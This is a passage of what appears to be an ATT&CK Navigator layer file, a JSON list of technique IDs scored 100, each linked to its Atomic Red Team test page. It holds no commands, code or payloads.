ithub.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"commen
t":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/
redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1041","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-
team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/bl
ob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-te
am/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-r
ed-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/red
canaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/re
dcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/a
tomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1091","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/
T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"
techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","s
core":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T113
7","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1187","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcana
ryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryc
